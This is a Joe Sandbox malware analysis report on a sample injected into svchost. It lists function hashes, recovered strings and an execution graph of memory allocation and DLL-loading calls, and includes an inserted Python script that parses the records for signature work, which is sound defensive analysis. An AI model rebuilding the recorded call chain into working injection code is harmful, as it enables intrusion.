                                                                      • Instruction ID: ea823bd71f6fac6b700639654bc3c90224e0d158e893e6197181927e5a3610b9
                                                                      • Opcode Fuzzy Hash: 0481ea74049fb896fde31f96817b64768b1d8d05ace1ad6539e47e5253c6c625
                                                                      • Instruction Fuzzy Hash: 8190023121240C42E100B2584444B86000687E0301F95C016A112465CD8715C9917521
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea6db88fe10fbcd71bc28a7346cc602cda4a04e53baade636e4b72411cc81879
                                                                      • Instruction ID: 231de5b90175183074efa9f55eb90d3efc736cd6d20a6776324fa4bbfcc47fa5
                                                                      • Opcode Fuzzy Hash: ea6db88fe10fbcd71bc28a7346cc602cda4a04e53baade636e4b72411cc81879
                                                                      • Instruction Fuzzy Hash: EA90023121240802E100B6985448686000687E0301F95D011A602455DEC76589D16131
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2ff0fae5997e20b29a3b958968149607751b103401add5069af918fdf1ffa5ca
                                                                      • Instruction ID: 9328f2d54f61e1075992c330148f84a325afdc39b6ed3ab225f93c040cdab384
                                                                      • Opcode Fuzzy Hash: 2ff0fae5997e20b29a3b958968149607751b103401add5069af918fdf1ffa5ca
                                                                      • Instruction Fuzzy Hash: 2F90023121240803E100B2585548747000687D0301F95D411A142455CDD75689916121
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a8d86bb1e4140ca3030405fbce269b7be21290039f3b191106e1f209ba1e1959
                                                                      • Instruction ID: 58b2041be9d331f3bb111dd8a824763c3e2004e816cdb90095b5de1b838f0b06
                                                                      • Opcode Fuzzy Hash: a8d86bb1e4140ca3030405fbce269b7be21290039f3b191106e1f209ba1e1959
                                                                      • Instruction Fuzzy Hash: 9C90022161640802E140B2585458746001687D0301F95D011A102455CDC7598B9566A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 812e1232c8ca1a95e6905f0da65733dd34ec170530659caed6e27c48560ee140
                                                                      • Instruction ID: fa55d6c7669637396b09e0f5362acac3026daf165a834f230aa773b60e0e0fdc
                                                                      • Opcode Fuzzy Hash: 812e1232c8ca1a95e6905f0da65733dd34ec170530659caed6e27c48560ee140
                                                                      • Instruction Fuzzy Hash: E590022121284842E140B3584844B4F410687E1302FD5C019A515655CCCA1589955721
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b101d3da0a3ffa37f6626541fae7b10732ec3b5985a02858ebb4532bd31ca618
                                                                      • Instruction ID: 0f229c6b5cecdcdf17726ab7385c0f94356db6b311f9a98996215ecffa47e17c
                                                                      • Opcode Fuzzy Hash: b101d3da0a3ffa37f6626541fae7b10732ec3b5985a02858ebb4532bd31ca618
                                                                      • Instruction Fuzzy Hash: 4B90022125240C02E140B25884547470007C7D0701F95C011A102455CD87168AA566B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 41bf5597ebd754c665548ee6d40be457c23777f6bd7acd3e88186a4c6c8085e6
                                                                      • Instruction ID: c7f44bb53faed3a815c51cc8f18f3bbff9e17cecc4a90fdee1632d959b480667
                                                                      • Opcode Fuzzy Hash: 41bf5597ebd754c665548ee6d40be457c23777f6bd7acd3e88186a4c6c8085e6
                                                                      • Instruction Fuzzy Hash: F390022125645502E150B25C44446564006A7E0301F95C021A181459CD865589956221
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0fe688b6d143a204cf462fa51886b83a311c6d8a1e1cc2de9dc082364698ba2b
                                                                      • Instruction ID: 2b6471becfb57ec55c5ef4c026b80e61c84892f9eaeab654927c97d992275b70
                                                                      • Opcode Fuzzy Hash: 0fe688b6d143a204cf462fa51886b83a311c6d8a1e1cc2de9dc082364698ba2b
                                                                      • Instruction Fuzzy Hash: B990023121340542A540B3585844A8E410687E1302BD5D415A101555CCCA1489A15221
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ebb05a5210cd0a919404ab300aa71ab3c06881d1df48ff2ffdb54feb0a61d8fa
                                                                      • Instruction ID: 592ae4ba8f6ff67eebbf58e8fb9468f42b7137623c7149cf6b6e07d4edfe9380
                                                                      • Opcode Fuzzy Hash: ebb05a5210cd0a919404ab300aa71ab3c06881d1df48ff2ffdb54feb0a61d8fa
                                                                      • Instruction Fuzzy Hash: 2890023521240802E510B2585844686004787D0301F95D411A142455CD875489E1A121
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction ID: 9aeb784750170df4d46d131ccac2f7d8f75cf40f13a631d739980b1b2c4b452e
                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction Fuzzy Hash:
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                      • API String ID: 48624451-2108815105
                                                                      • Opcode ID: f0c3976081319ee4e2a26ce1f124ac75d00297a1ee97ac2a95d57698c0fa170b
                                                                      • Instruction ID: a54dc0921717355e43369596efffd9a26ace6ef8b88aa23541d0afa79a63cd6a
                                                                      • Opcode Fuzzy Hash: f0c3976081319ee4e2a26ce1f124ac75d00297a1ee97ac2a95d57698c0fa170b
                                                                      • Instruction Fuzzy Hash: 0D51B8B5A24617FFCB10DB9C889097EF7B8BF082007288569E4A5D7641D274DEC4CBE0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                      • API String ID: 48624451-2108815105
                                                                      • Opcode ID: f2e111513c44f1a2f8544bd4da3404cbf9ffc3ca9dc8e8c2cc010a7f8b26eb9a
                                                                      • Instruction ID: 01f8d34d66b1f8fff7f492f34826512f23621204787e03dc1b3ec911c4e9a2c4
                                                                      • Opcode Fuzzy Hash: f2e111513c44f1a2f8544bd4da3404cbf9ffc3ca9dc8e8c2cc010a7f8b26eb9a
                                                                      • Instruction Fuzzy Hash: 77512975A20756EECB24EF5CCD9187FB7FCEB44200B848859E4A7CB641D7B4EA808760
                                                                      Strings
                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 032A4787
                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 032A46FC
                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 032A4725
                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 032A4742
                                                                      • Execute=1, xrefs: 032A4713
                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 032A4655
                                                                      • ExecuteOptions, xrefs: 032A46A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                      • API String ID: 0-484625025
                                                                      • Opcode ID: ae0ccc136d29bc4c7cbdbfef11c42d1e4d4561490d920328c4016e6480bb60b6
                                                                      • Instruction ID: 7926886763741e7b1a912c78a45c1410ee1a83f6d1cd1e514d03949a42215fa9
                                                                      • Opcode Fuzzy Hash: ae0ccc136d29bc4c7cbdbfef11c42d1e4d4561490d920328c4016e6480bb60b6
                                                                      • Instruction Fuzzy Hash: A6510B35620319BBDF11EA6DED85FAE73BCAF14308F0400E9D605AB191D7B0AAD58F50
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                      • Instruction ID: be723cca41009f3c3d40d364d636538b84c4fc5d329332f2bbc1160ea7538bbc
                                                                      • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                      • Instruction Fuzzy Hash: AE0223B5508341AFC304DF18C9A1A6BBBE5FFC8700F04892DB9899B2A4DB71E945CB52
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldvrm
                                                                      • String ID: +$-$0$0
                                                                      • API String ID: 1302938615-699404926
                                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                      • Instruction ID: e001e4af4ef18d5b9ee414c5d0a0b86d8fe5d5049356b6a5cabcf73d164bc066
                                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                      • Instruction Fuzzy Hash: AF81D175E2524A9EDF28CE68C8917FEBBB5BF45310F1C425AD861AB390C77498C0CB54
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: %%%u$[$]:%u
                                                                      • API String ID: 48624451-2819853543
                                                                      • Opcode ID: 378035b84d1cdac5bb56355708fb774f17c59a10302212110147fc4e22cbd17e
                                                                      • Instruction ID: 1a6ad7516f36d1b4ae05f592742d9565a72ff6155f90bbe2fb544777c2111ac8
                                                                      • Opcode Fuzzy Hash: 378035b84d1cdac5bb56355708fb774f17c59a10302212110147fc4e22cbd17e
                                                                      • Instruction Fuzzy Hash: BC21957AA20319EBCB10EF79CC41AEEBBFCEF44640F480516E905E7201E770DA418BA1
                                                                      Strings
                                                                      • RTL: Re-Waiting, xrefs: 032A031E
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032A02E7
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032A02BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                      • API String ID: 0-2474120054
                                                                      • Opcode ID: 0770ced0a8543f188d65096712d2bfc3eda5775874fcc5ab36c9d862c537c220
                                                                      • Instruction ID: be7f0e556b13158cc69630657756a1ccfef2e696e369f2ded72237e1c17dbd98
                                                                      • Opcode Fuzzy Hash: 0770ced0a8543f188d65096712d2bfc3eda5775874fcc5ab36c9d862c537c220
                                                                      • Instruction Fuzzy Hash: 6EE1B230624742EFD725CF28C984B2AB7E4BF84714F184A5DF9A58B2D1D7B4DA84CB42
                                                                      Strings
                                                                      • RTL: Resource at %p, xrefs: 032A7B8E
                                                                      • RTL: Re-Waiting, xrefs: 032A7BAC
                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 032A7B7F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                      • API String ID: 0-871070163
                                                                      • Opcode ID: 93c8382d003a1af5c420777872f38e1e2e95cb7b159291926bb5e2ecbe6792d6
                                                                      • Instruction ID: 3437a982b7288415a937c33a05f122bfdd8225231925c00d989783ed3016b93e
                                                                      • Opcode Fuzzy Hash: 93c8382d003a1af5c420777872f38e1e2e95cb7b159291926bb5e2ecbe6792d6
                                                                      • Instruction Fuzzy Hash: 3841E1353207029FC724DE6ACD40B6AB7E9EF88710F140A2DF95ADB690DB71E4C58B91
                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 032A728C
                                                                      Strings
                                                                      • RTL: Resource at %p, xrefs: 032A72A3
                                                                      • RTL: Re-Waiting, xrefs: 032A72C1
                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 032A7294
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                      • API String ID: 885266447-605551621
                                                                      • Opcode ID: 1b454e623a544f7b30e6fde3a50d3c081a99c8f9073638d8b7a40812b3d1ac0f
                                                                      • Instruction ID: b4ef0d45abcb9dd8cf0750245503b0f4995caaab8f432e0e18494ef398bed3f0
                                                                      • Opcode Fuzzy Hash: 1b454e623a544f7b30e6fde3a50d3c081a99c8f9073638d8b7a40812b3d1ac0f
                                                                      • Instruction Fuzzy Hash: 6E41FF35720B06ABC720DE69CC41B6AB7A5FF84710F140629F995EB280DB71E8D28BD5
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: %%%u$]:%u
                                                                      • API String ID: 48624451-3050659472
                                                                      • Opcode ID: 18836de5fd87b1ec9623136bd4798d2e3744f7d1c428deaa92cd06dc0edef5be
                                                                      • Instruction ID: 34bf7510d0e48d27dd44ab201ab035bfc87b1377ae5cc344b44fc9514cb727d0
                                                                      • Opcode Fuzzy Hash: 18836de5fd87b1ec9623136bd4798d2e3744f7d1c428deaa92cd06dc0edef5be
                                                                      • Instruction Fuzzy Hash: D4316876A10319DFDB20EF29DC41BEEB7BCFB44610F844556E849E7240EB709A848F61
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldvrm
                                                                      • String ID: +$-
                                                                      • API String ID: 1302938615-2137968064
                                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                      • Instruction ID: c87f3187002f12933c02a48904b7cdd74a32ebf3003ddae543596ad2d33be7ff
                                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                      • Instruction Fuzzy Hash: F991C371E202179BDF24DF6DC981ABEB7A5FF45320F18452AE865E72C0D77089C18B51
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$@
                                                                      • API String ID: 0-1194432280
                                                                      • Opcode ID: 572d6aac54eae635856ab768d2069edf3a0ce3ce03660b4df34713a05be4aa76
                                                                      • Instruction ID: d485000cf386a483e8a260abf34842b9dc4d37675d8b88fa4411bc92416875d2
                                                                      • Opcode Fuzzy Hash: 572d6aac54eae635856ab768d2069edf3a0ce3ce03660b4df34713a05be4aa76
                                                                      • Instruction Fuzzy Hash: 678108B6D10269DBDB25DF54CC44BEEB6B8AF09710F0445EAA919B7280D7709EC4CFA0
                                                                      APIs
                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 032BCFBD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CallFilterFunc@8
                                                                      • String ID: @$@4Cw@4Cw
                                                                      • API String ID: 4062629308-3101775584
                                                                      • Opcode ID: 80d3acf8d3877f2a1df0f3fc2081534e3baba8778b8b3cbdfc6460daa3919efb
                                                                      • Instruction ID: fad3bb92f11810c9d917850b44c34b7d3afceb3593eb79abecc94ceaae6cce8e
                                                                      • Opcode Fuzzy Hash: 80d3acf8d3877f2a1df0f3fc2081534e3baba8778b8b3cbdfc6460daa3919efb
                                                                      • Instruction Fuzzy Hash: B141D079A20324DFCB21DFA9C880AADBBB8FF45750F04446AE914DB255D7B4D881CB60
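The Similarity records above list, per recovered function, the API ID, String ID, API String ID, Opcode ID and fuzzy-hash fingerprints that Joe Sandbox uses to match functions across samples. Several of the records carry ntdll's own debug strings (the "CLIENT(ntdll):" and "RTL:" messages), so those functions hash like clean ntdll code rather than anything specific to this sample and make poor candidates for a sample-specific signature. The Python script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses an abbreviated excerpt of three records copied from the report above, groups functions that share an API String ID (same API and string profile, different code), and sets aside records whose strings mark them as library code. The marker list and the field names it keys on are assumptions drawn from the records shown.

```python
"""Parse Joe Sandbox 'Similarity' function records and rank them for signature use."""
import re
from collections import defaultdict

# Constructed excerpt: three records copied from the report above, abbreviated
# to the fields this script reads. Field names match the report's bullets.
SAMPLE_RECORDS = """\
Memory Dump Source
• Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: f0c3976081319ee4e2a26ce1f124ac75d00297a1ee97ac2a95d57698c0fa170b
• Instruction Fuzzy Hash: 0D51B8B5A24617FFCB10DB9C889097EF7B8BF082007288569E4A5D7641D274DEC4CBE0
Memory Dump Source
• Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: f2e111513c44f1a2f8544bd4da3404cbf9ffc3ca9dc8e8c2cc010a7f8b26eb9a
• Instruction Fuzzy Hash: 77512975A20756EECB24EF5CCD9187FB7FCEB44200B848859E4A7CB641D7B4EA808760
Memory Dump Source
• Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$Execute=1$ExecuteOptions
• API String ID: 0-484625025
• Opcode ID: ae0ccc136d29bc4c7cbdbfef11c42d1e4d4561490d920328c4016e6480bb60b6
• Instruction Fuzzy Hash: A6510B35620319BBDF11EA6DED85FAE73BCAF14308F0400E9D605AB191D7B0AAD58F50
"""

# One "• Name: value" bullet per field; the value may itself contain colons.
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
# Assumed marker list: prefixes of debug strings that belong to ntdll itself,
# not to the malware author's code.
LIBRARY_STRING_MARKERS = ("CLIENT(ntdll):", "RTL:")


def parse_records(text):
    """Split the report text into one dict per 'Memory Dump Source' record."""
    records, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if line == "Memory Dump Source":
            current = {}
            records.append(current)
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            current[m.group(1).strip()] = m.group(2).strip()
    return records


def is_library_code(record):
    """True when the function's strings are recognised ntdll debug messages."""
    strings = record.get("String ID", "")
    return any(marker in strings for marker in LIBRARY_STRING_MARKERS)


def group_by_profile(records):
    """Map each 'API String ID' (API + string profile) to the Opcode IDs sharing it.

    Two entries under one key are functions with identical API/string usage but
    different code, e.g. the two ___swprintf_l address formatters above."""
    groups = defaultdict(list)
    for r in records:
        key = r.get("API String ID", "")
        if key:
            groups[key].append(r.get("Opcode ID", ""))
    return dict(groups)


def signature_candidates(records):
    """Opcode IDs not flagged as library code; still needs analyst review,
    since the marker list only catches ntdll's tagged debug strings."""
    return [r["Opcode ID"] for r in records if not is_library_code(r)]
```

To apply this to the whole report, paste every record block into SAMPLE_RECORDS or read the report text from a file; the parser keys only on the "Memory Dump Source" separator and the bullet fields, so the extra bullets in the full records are kept as additional keys.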

                                                                      Execution Graph

                                                                      Execution Coverage: 2.5%
                                                                      Dynamic/Decrypted Code Coverage: 4.4%
                                                                      Signature Coverage: 0%
                                                                      Total number of Nodes: 434
                                                                      Total number of Limit Nodes: 71
                                                                      execution_graph 100282 249178b 100283 249179f 100282->100283 100284 2491793 PostThreadMessageW 100282->100284 100284->100283 100285 2492c40 100286 2492c5c 100285->100286 100291 24a94d0 100286->100291 100290 2492c8b 100292 24a94ea 100291->100292 100300 44c2c0a 100292->100300 100293 2492c76 100295 24a9f10 100293->100295 100296 24a9f3e 100295->100296 100297 24a9fa2 100295->100297 100296->100290 100303 44c2e80 LdrInitializeThunk 100297->100303 100298 24a9fd3 100298->100290 100301 44c2c1f LdrInitializeThunk 100300->100301 100302 44c2c11 100300->100302 100301->100293 100302->100293 100303->100298 100304 24a6a40 100305 24a6a9a 100304->100305 100307 24a6aa7 100305->100307 100308 24a4460 100305->100308 100315 24abe70 100308->100315 100310 24a44a1 100313 24a45ae 100310->100313 100318 2494f00 100310->100318 100312 24a4530 Sleep 100314 24a44e7 100312->100314 100313->100307 100314->100312 100314->100313 100322 24a9fe0 100315->100322 100317 24abea1 100317->100310 100319 2494f24 100318->100319 100320 2494f2b 100319->100320 100321 2494f72 LdrLoadDll 100319->100321 100320->100314 100321->100320 100323 24aa075 100322->100323 100325 24aa00b 100322->100325 100324 24aa08b NtAllocateVirtualMemory 100323->100324 100324->100317 100325->100317 100326 24a0200 100327 24a0264 100326->100327 100355 2496c60 100327->100355 100329 24a039e 100330 24a0397 100330->100329 100362 2496d70 100330->100362 100332 24a0543 100333 24a041a 100333->100332 100334 24a0552 100333->100334 100366 249ffe0 100333->100366 100335 24a9e80 NtClose 100334->100335 100338 24a055c 100335->100338 100337 24a0456 100337->100334 100339 24a0461 100337->100339 100375 24abfe0 100339->100375 100341 24a048a 100342 24a04a9 100341->100342 100343 24a0493 100341->100343 100378 249fed0 CoInitialize 100342->100378 100344 24a9e80 NtClose 100343->100344 100346 24a049d 100344->100346 100347 24a04b7 100381 24a9950 100347->100381 100349 24a0532 100385 24a9e80 100349->100385 
100351 24a053c 100388 24abf00 100351->100388 100353 24a04d5 100353->100349 100354 24a9950 LdrInitializeThunk 100353->100354 100354->100353 100356 2496c93 100355->100356 100357 2496cb7 100356->100357 100391 24a99f0 100356->100391 100357->100330 100359 2496cda 100359->100357 100360 24a9e80 NtClose 100359->100360 100361 2496d5c 100360->100361 100361->100330 100363 2496d95 100362->100363 100396 24a97e0 100363->100396 100367 249fffc 100366->100367 100368 2494f00 LdrLoadDll 100367->100368 100370 24a001a 100368->100370 100369 24a0023 100369->100337 100370->100369 100371 2494f00 LdrLoadDll 100370->100371 100372 24a00ee 100371->100372 100373 2494f00 LdrLoadDll 100372->100373 100374 24a014b 100372->100374 100373->100374 100374->100337 100401 24aa1a0 100375->100401 100377 24abffb 100377->100341 100380 249ff35 100378->100380 100379 249ffcb CoUninitialize 100379->100347 100380->100379 100382 24a996a 100381->100382 100404 44c2ba0 LdrInitializeThunk 100382->100404 100383 24a999a 100383->100353 100386 24a9e9d 100385->100386 100387 24a9eae NtClose 100386->100387 100387->100351 100405 24aa1f0 100388->100405 100390 24abf19 100390->100332 100392 24a9a0d 100391->100392 100395 44c2ca0 LdrInitializeThunk 100392->100395 100393 24a9a39 100393->100359 100395->100393 100397 24a97fa 100396->100397 100400 44c2c60 LdrInitializeThunk 100397->100400 100398 2496e09 100398->100333 100400->100398 100402 24aa1bd 100401->100402 100403 24aa1ce RtlAllocateHeap 100402->100403 100403->100377 100404->100383 100406 24aa20d 100405->100406 100407 24aa21e RtlFreeHeap 100406->100407 100407->100390 100408 24ad000 100409 24abf00 RtlFreeHeap 100408->100409 100410 24ad015 100409->100410 100411 24a9b80 100412 24a9c3a 100411->100412 100414 24a9bb2 100411->100414 100413 24a9c50 